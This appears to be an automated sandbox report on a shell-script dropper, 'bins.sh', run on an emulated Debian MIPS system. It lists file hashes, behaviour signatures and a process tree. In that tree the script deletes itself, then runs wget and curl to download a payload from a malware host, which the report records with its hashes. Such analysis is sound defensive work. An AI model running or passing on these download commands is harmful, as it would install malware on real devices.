Analysis

  • max time kernel
    149s
  • max time network
    9s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    05/12/2024, 07:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4ec351f49dc5766e37b9f2ca107ea79f

  • SHA1

    1e9e758cc6d6441d23748b0a346dcfc1df30e105

  • SHA256

    c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

  • SHA512

    5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c

  • SSDEEP

    192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:696
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:699
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:702
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:720

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

              Filesize

              177KB

              MD5

              786d75a158fe731feca3880f436082c0

              SHA1

              79ea2734e43d00cdeabed5586b2c1994d02aef3e

              SHA256

              5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

              SHA512

              7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f